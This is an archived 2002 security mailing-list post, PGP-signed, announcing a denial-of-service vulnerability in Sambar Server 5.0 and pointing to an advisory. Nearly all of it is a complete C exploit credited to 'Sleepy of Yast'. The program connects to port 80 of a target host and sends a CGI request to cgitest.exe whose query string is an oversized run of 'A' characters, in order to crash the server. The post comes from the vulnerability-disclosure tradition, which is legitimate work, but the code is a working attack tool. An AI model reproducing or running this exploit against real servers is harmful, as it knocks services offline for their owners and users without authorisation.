Sambar Webserver Sample Script v5.1 DoS Vulnerability Exploit

From: Tamer Sahin (tsat_private)
Date: Tue Jan 01 2002 - 13:51:33 PST

Previous message: Chad Loder: "Re: Script for find domino's users"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Orginal Advisory: http://www.securityoffice.net/articles/sambar/

- ------------------<snip>----------------------------------------------
- ----------------------------------------
/*********************************************************************
**********
**
**               06.02.2002 - GREETZ TO WbC-BoArD & YAST CREW        
        
**
**               Compiled with gcc under linux with kernel 2.4.17    
        
**
**               Programname: Sambar Server 5.0  Manufacturer:Jalyn  
        
**
**********************************************************************
*********/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

#define SERVER_PORT 80
#define MAX_MSG 100
    
  int sd, rc, i,j;
  char buf[5000];
  char msgtosnd[5024];
  char msgtoget[102400];
  char source[200000];
  struct sockaddr_in localAddr, servAddr;
  struct hostent *h;
  FILE *f1;
  
int main (int argc, char *argv[]) {
printf("Sleepy of Yast presents \"Sambar Server Production 5.0
Crasher\"\n");
if(argc != 2)
{
printf(">>> usage: %s <ip>",argv[0]);exit(0);
};
h = gethostbyname(argv[1]);
if(h==NULL)
{
printf("%s: unknown host '%s'\n",argv[0],argv[1]);
exit(1);
}
servAddr.sin_family = h->h_addrtype;
memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0],
h->h_length);
servAddr.sin_port = htons(SERVER_PORT);
sd = socket(AF_INET, SOCK_STREAM, 0);
if(sd<0)
{
perror("cannot open socket ");
exit(1);
}

localAddr.sin_family = AF_INET;
localAddr.sin_addr.s_addr = htonl(INADDR_ANY);
localAddr.sin_port = htons(0);
rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr));

if(rc<0)
{
printf("%s: cannot bind port TCP %u\n",argv[0],SERVER_PORT);
perror("error ");
exit(1);
}
rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
if(rc<0)
{
perror("cannot connect ");
exit(1);
};
strcpy(buf,"A");
fprintf(stderr,"Entering Loop\n");
for(i=1;i<4000;i++)
{
strcat(buf,"A");
}
sprintf(msgtosnd,"GET /cgi-win/cgitest.exe?%s HTTP/1.1\nhost: 
localhost\n\n\n",buf);
for(j=0;j<5;j++)
{
send(sd,msgtosnd,5024,0);
}
printf("\n\n BOOOOM");
}
- ------------------<snap>----------------------------------------------
- ---------------------------------------

Tamer Sahin
http://www.securityoffice.net
PGP Key ID: 0x2B5EDCB0

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

iQA/AwUBPDIvZLuLpFMrXtywEQLPTQCghjA86aQNKMKYiTdJ/wkade1dZPoAn35c
bqGIVJG8SKE8tc5cZXcPs+i6
=5ywY
-----END PGP SIGNATURE-----

Previous message: Chad Loder: "Re: Script for find domino's users"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Feb 06 2002 - 17:13:40 PST